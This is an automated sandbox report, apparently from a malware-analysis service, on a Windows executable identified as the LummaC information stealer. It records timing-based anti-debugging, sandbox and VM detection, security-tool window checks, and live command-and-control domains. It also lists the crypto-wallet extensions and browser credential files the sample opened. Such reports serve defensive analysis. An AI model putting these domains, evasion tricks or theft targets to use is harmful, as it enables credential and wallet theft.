              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30BCA second address: 4D30BD9 instructions: 0x00000000 rdtsc 0x00000002 mov ch, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dh, al 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30BD9 second address: 4D30BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30BE0 second address: 4D30C17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 mov edx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007F9F08C2F7E8h 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov dl, 12h 0x00000017 popad 0x00000018 cmp dword ptr [75AB459Ch], 05h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30C17 second address: 4D30C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30C1E second address: 4D30C78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F08C2F7E8h 0x00000009 xor eax, 27ED7268h 0x0000000f jmp 00007F9F08C2F7DBh 0x00000014 popfd 0x00000015 mov ax, 605Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007F9F7994D582h 0x00000022 pushad 0x00000023 mov ebx, eax 0x00000025 jmp 00007F9F08C2F7DCh 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F9F08C2F7DAh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30C78 second address: 4D30C7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30C7C second address: 4D30C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CA8 second address: 4D30CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CAC second address: 4D30CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CB0 second address: 4D30CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CB6 second address: 4D30CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 19C86D03h 0x0000000e jmp 00007F9F08C2F7E1h 0x00000013 xor dword ptr [esp], 6C62F12Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f mov si, di 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D30CF4 second address: 4D30D56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F08C2E4C0h 0x00000009 sbb si, 0F18h 0x0000000e jmp 00007F9F08C2E4BBh 0x00000013 popfd 0x00000014 mov si, 06CFh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b call 00007F9F79953308h 0x00000020 push 75A52B70h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov eax, dword ptr [esp+10h] 0x00000030 mov dword ptr [esp+10h], ebp 0x00000034 lea ebp, dword ptr [esp+10h] 0x00000038 sub esp, eax 0x0000003a push ebx 0x0000003b push esi 0x0000003c push edi 0x0000003d mov eax, dword ptr [75AB4538h] 0x00000042 xor dword ptr [ebp-04h], eax 0x00000045 xor eax, ebp 0x00000047 push eax 0x00000048 mov dword ptr [ebp-18h], esp 0x0000004b push dword ptr [ebp-08h] 0x0000004e mov eax, dword ptr [ebp-04h] 0x00000051 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000058 mov dword ptr [ebp-08h], eax 0x0000005b lea eax, dword ptr [ebp-10h] 0x0000005e mov dword ptr fs:[00000000h], eax 0x00000064 ret 0x00000065 pushad 0x00000066 pushfd 0x00000067 jmp 00007F9F08C2E4C0h 0x0000006c adc cl, 00000078h 0x0000006f jmp 00007F9F08C2E4BBh 0x00000074 popfd 0x00000075 popad 0x00000076 mov esi, 00000000h 0x0000007b push eax 0x0000007c push edx 0x0000007d pushad 0x0000007e push ebx 0x0000007f pop esi 0x00000080 mov bx, B13Eh 0x00000084 popad 0x00000085 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40AD5 second address: 4D40AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F08C2F7E0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40AEA second address: 4D40B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F9F08C2E4BEh 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40B07 second address: 4D40B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 3667092Eh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40B11 second address: 4D40B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F9F08C2E4C6h 0x00000011 mov dword ptr [esp], esi 0x00000014 pushad 0x00000015 mov si, B4FDh 0x00000019 call 00007F9F08C2E4BAh 0x0000001e pop edi 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40B50 second address: 4D40B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40B56 second address: 4D40BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov esi, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d pushad 0x0000000e call 00007F9F08C2E4BBh 0x00000013 movzx ecx, bx 0x00000016 pop edx 0x00000017 jmp 00007F9F08C2E4C2h 0x0000001c popad 0x0000001d je 00007F9F7993BCE7h 0x00000023 jmp 00007F9F08C2E4C0h 0x00000028 cmp dword ptr [75AB459Ch], 05h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40BA9 second address: 4D40BAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40BAF second address: 4D40BE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9F79953D86h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9F08C2E4C7h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40BE6 second address: 4D40C65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F9F08C2F7DAh 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007F9F08C2F7E7h 0x0000001b sub si, B42Eh 0x00000020 jmp 00007F9F08C2F7E9h 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007F9F08C2F7E1h 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40C65 second address: 4D40C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40CAA second address: 4D40CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F08C2F7E7h 0x00000009 sbb esi, 61E389AEh 0x0000000f jmp 00007F9F08C2F7E9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 4D40CE7 second address: 4D40D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F9F08C2E4C8h 0x0000000f mov di, ax 0x00000012 popad 0x00000013 push esi 0x00000014 mov dx, 7070h 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c jmp 00007F9F08C2E4C5h 0x00000021 pushad 0x00000022 push esi 0x00000023 pop edx 0x00000024 mov edx, esi 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F9F08C2E4BBh 0x00000030 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSpecial instruction interceptor: First address: 5B8DE4 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSpecial instruction interceptor: First address: 7E73B6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe TID: 7468Thread sleep time: -30015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe TID: 7620Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exe TID: 7616Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: ARoqFi68Nr.exe, 00000000.00000002.1597554236.0000000000744000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.0000000001097000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388585295.00000000056C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: ARoqFi68Nr.exe, 00000000.00000002.1597554236.0000000000744000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: ARoqFi68Nr.exe, 00000000.00000003.1388658686.00000000056B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: SICE
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: ARoqFi68Nr.exe, 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000003.1315215170.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
              Source: ARoqFi68Nr.exe, 00000000.00000002.1597750238.0000000000786000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 'Program Manager
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: ARoqFi68Nr.exe, 00000000.00000003.1527118619.0000000001131000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1527003067.000000000111D000.00000004.00000020.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1527136685.0000000001134000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: ARoqFi68Nr.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: ARoqFi68Nr.exeString found in binary or memory: Jaxx Liberty
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: ARoqFi68Nr.exe, 00000000.00000003.1597043984.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbmlmnplgbn","ez":"Sub"},{"en":"mopnmbcafieddcagagd
              Source: ARoqFi68Nr.exe, 00000000.00000002.1598362916.00000000010E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: ARoqFi68Nr.exe, 00000000.00000003.1505687237.0000000001134000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: ARoqFi68Nr.exe, 00000000.00000003.1505373568.0000000001131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
